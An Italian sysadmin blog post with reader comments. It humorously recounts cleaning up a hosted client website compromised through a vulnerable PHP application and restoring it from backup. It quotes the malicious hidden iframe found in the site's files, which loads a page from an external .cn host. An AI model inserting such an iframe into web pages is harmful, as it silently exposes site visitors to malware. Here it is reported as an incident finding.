Tales from the Machine Room


Home Page | Comments | Articles | Faq | Documents | Search | Archive | Tales from the Machine Room | Contribute | Login/Register

Che domande

E venne il giorno che il mio collega T se ne ri-va' in ferie. E non e' che decide di andarsene in campagna. Nooooo... se ne va', nientepopodimeno che, in Canada. Per un mese (!).

Prima di andarsene in ferie mi passa un paio di mail relative all'arcifamosa applicazione di backup, adesso pare che ogni 2 x 3 l'arnese si ciucci via tutta la memoria disponibile e crashi la macchina che dovrebbe fare da server. Con il risultato che il backup non funziona piu' per niente e basta.

Io rimango della mia idea che un bel tar.gz + scp e' sempre la cosa migliore ma noooooo.

Comunque, mentre sono li' che litigo con i babbuini dell'applicazione (spiegami un po' perche' ti serve una shell con accesso root al mio server di backup per debuggarmi il problema), mi arriva Bert tutto trafelato.

Bert - CL!
IO - CL che?
Bert - Ti ricordi del problema di CL?
IO - A quale degli ennemila problemi di CL ti riferisci?
Bert - Quello della security del loro server.
IO - Sinceramente no, non me lo ricordo.
Bert - Ma T non ti ha passato il problema?
IO - L'unica cosa che mi ha passato e' questa roba del backup, per il resto nada. Sicuramente niente di relativo a CL ed al suo server.

Nel giro di dieci minuti Bert mi gira la mail, che altro non e' che una mail forwardata da qualcuno che lamenta che, in uno dei millemila siti che sono ospitati sul server di CL ci sta' un qualche tipo di malware - crapware - spyware - sarca$$o.

Lascio perdere per un attimo il backup e vado a vedere che succede sul sito di CL. E noto subito che il rapportino pare dire la verita'. In parecchi dei file di questa merdaccia trovo:


<iframe src="http://bigbestlite.cn:8080/index.php" width=179 height=102
style="visibility: hidden"></iframe>

Oh che gioia.

Naturalmente, nel giro di 5 minuti quella palla-al-piede di P arriva subito a rompere i marroni del come e del cosa. Quajo', e dammi almeno il tempo di guardarlo sto coso no?

Comunque da quello che vedo non e' qualcuno che ha fatto qualche cosa via ftp o SSH. Sembra proprio che il malandrino abbia usato quella meraviglia di phpapplicazione del menga di cui gia' dissi qui e qui. Il che mi semplifica la vita perche' posso tranquillamente dirgli di andarsi a lamentare con chi quell'arnese lo sviluppa invece di preoccuparmi io. Ma per il momento dovro' fare un bel restore del sito precedente. Precedente all'hackeraggio intendo. Ok, acchiappa quella meraviglia (sic) di applicazione di backup e chiedi il restore dell'intero sito al giorno $giornohackeraggio[-1].

E qui' casca l'asina: a quanto pare la password - chiave di decrittazione che sta' scritta in corrispondenza di CL nel nostro strepitoso database di configurazione e' sbagliata. Nel senso che il foxxuto programma di restore mi segnala errore di decrittazione per il 50% dei files e non ripristina una beata favonza.

Dopo un paio di madonne ed una lettura della documentazione di questo arnese scopro che se richiamo il malefico backup manager con un certo switch lui mi visualizza la password di crittazione. Mai la frase "ma a che ca$$o serve?" e' stato pronunciata piu' spesso.

Comunque, riesco a fare il restore, mi faccio una copia (un bel tar.gz) del sito 'incriminato', zappo via il tutto e poi ci scarico sopra la versione precedente.

E non funziona un tubo naturalmente. Perche' devi anche fare il restore del database ovviamente. Dopo un paio di ore di ravanamento il sito sembra riprendere vita e funzionare in modo decente. Almeno "decente" se si considera la phporcata ovviamente.

Un paio d'ore dopo P ritorna a rompere i marroni.

P - Sei riuscito a capire come hanno fatto ad entrarci dentro?
IO - Entrarci?
P - Intendo sul server di CL.
IO - Nessuno e' entrato da nessuna parte. Hanno usato quella chiavica di PhPorcata per gestire il sito.
P - E come hanno fatto? Non c'e' una password o roba cosi'?
IO - Non lo so se c'e' una password o no. Puo' darsi ci sia, dovresti domandarlo a CL. Ma conoscendo CL, se una password c'e', probabilmente e' "password".
P - E se non e' cosi'?
IO - Se non e' cosi' magari hanno usato un qualche baco di quella chiavica di coso, che tanto a posto comunque non mi sembra. In ogni caso, non sono affari nostri. Noi gestiamo il server dal punto di vista hardware ed OS, non gestiamo la schifosa applicazione.
P - Ma se il cliente ci domanda noi dobbiamo rispondere.
IO - Se vuoi la mia opinione, l'applicazione e' una chiavica e dovrebbe essere cestinata.
P - Ma non possiamo rispondergli cosi'.
IO - Perche' no?

P emette dei suoni volti ad indicare che non approva la mia idea ma non e' in grado di prodursi una risposta piu' efficace od articolata.

IO - Ed allora sarebbe opportuno che cercassero di "assicurarlo", nel senso di renderlo piu' sicuro, non stipulare una polizza, cambiando tutte le password e magari di rivedere il codice della chiavica in modo che il foxxuto coso non debba necessariamente avere tutti i permessi del mondo per poter funzionare.
P - Magari possiamo offrire di fare un controllo di sicurezza, come quello che tu facesti sul sito di $noicuriamoivostriinteressi.

Di quella cosa ne parlai qui, qui e per finire qui.

IO - Si'. Bello. Dopo che il sito e' stato hackato non c'e' piu' bisogno di domandare se il sito e' hackabile, la risposta la sai gia'.

Per la serie "chiudere la stalla dopo che i cavalli sono stati mangiati".

Davide
07/06/2010 08:00

Previous Next

Comments are added when and more important if I have the time to review them and after removing Spam, Crap, Phishing and the like. So don't hold your breath. And if your comment doesn't appear, is probably becuase it wasn't worth it.

7 messages this document does not accept new posts
Anonymous cowardLe mucche mangiate By Anonymous coward - posted 07/06/2010 09:39
Se non ricordo male nel film critters (gli extraroditori) erano le mucche ad essere mangiate.
Vedila cosė non importa se è tuo appannaggio o non se tu ci metti le mani e sempre colpa tua.
Ultimamente sono andato in ministreroitalianoperleattivitàgutturali ed ho semplicemente sostituito una tastiera, 1 microsec dopo è collassata la rete, indovina di chi era la colpa?

--
Anonymous coward


Davide Bianchi@ Anonymous coward By Davide Bianchi - posted 07/06/2010 09:42

> Ultimamente sono andato in ministreroitalianoperleattivitàgutturali ed ho semplicemente sostituito una tastiera, 1 microsec dopo è collassata la rete, indovina di chi era la colpa?

Ovviamente non hai verificato se la tastiera era compatibile con la rete

--
Davide Bianchi


Eremita Solitario@ Davide Bianchi By Eremita Solitario - posted 07/06/2010 13:05

> > Ultimamente sono andato in ministreroitalianoperleattivitàgutturali ed ho semplicemente sostituito una tastiera, 1 microsec dopo è collassata la rete, indovina di chi era la colpa?
>
> Ovviamente non hai verificato se la tastiera era compatibile con la rete
>

Si chiamano "Network-Keyboard", sembrano tastiere normali, anzi direi che sono proprio identiche, ma in realtà si collegano direttamete alla rete, e se sbagli... cade tutto, un po come i bambini che giocano a giro-giro-tondo...

--
Eremita Solitario


SicilianoEdivadHacking e Cracking By SicilianoEdivad - posted 07/06/2010 13:32

CRACKato! D, proprio su queste cose mi sbagli...
Comunque per le tastiere, è risaputo che la colpa è SEMPRE del sistemista! :P
Io alla risposta di P avrei risposto: certo che si può fare, ma è estremamente complesso blablablayadayadayadayada perciò voglio $cifrone sulla mia busta paga.
Al massimo CL rifiutava, no?

--
SicilianoEdivad


MaxCLienti By Max - posted 07/06/2010 23:11

> P - Ma non possiamo rispondergli cosi'.
> IO - Perche' no?

"Perche' ci paga e se gli rispondi cosi` non ci paga piu`". Lo so, non e` giusta, ma e` LA risposta.
Che P non sia in grado di darti nemmeno quella mi fa pensare sempre peggio di lui.

--
Max


argaar@ Max By argaar - posted 08/06/2010 11:31

> > P - Ma non possiamo rispondergli cosi'.
> > IO - Perche' no?
>
> "Perche' ci paga e se gli rispondi cosi` non ci paga piu`". Lo so, non e` giusta, ma e` LA risposta.

io mi sono tolto la soddisfazione ieri...è arrivato il capo dell'azienda per la quale facciamo interventi e mi ha cihesto perchè non funzionasse la tal applicazione (Java), alla scrivania accanto alla mia c'era colui che l'ha implementata, io l'ho guardato e gli ho detto semplicemente: "Perchè è uno schifo e si blocca sempre"

--
argaar


MuthleyFerie... By Muthley - posted 09/06/2010 21:07

> Nooooo... se ne va', nientepopodimeno che, in Canada. Per un mese (!).
Il sottoscritto, giusto giusto 2 anni fa a quest'ora era di ritorno da 1 mese di ferie da parenti tra Vancouver e Seattle.
Il bello è che da quando 8 mesi prima ho chiesto il permesso a $DaBoss a quando sono partito, si sono licenziate due persone (su 6 dipendenti). Uno dei due, che attualmente chiamiamo Barabba, ha lasciato una caterba di spaghetti code scritto coi piedi (leggerlo, è come tentare di riordinare gli spaghetti di un piatto di spaghetti alla carbonara). Il giorno dopo che questo è partito hanno cominciato ad esplodere bombe.

--
Muthley


7 messages this document does not accept new posts

Previous Next


This site is made by me with blood, sweat and gunpowder, if you want to republish or redistribute any part of it, please drop me (or the author of the article if is not me) a mail.


This site was composed with VIM, now is composed with VIM and the (in)famous CMS FdT.

This site isn't optimized for vision with any specific browser, nor it requires special fonts or resolution.
You're free to see it as you wish.

Web Interoperability Pleadge Support This Project
Powered By Gojira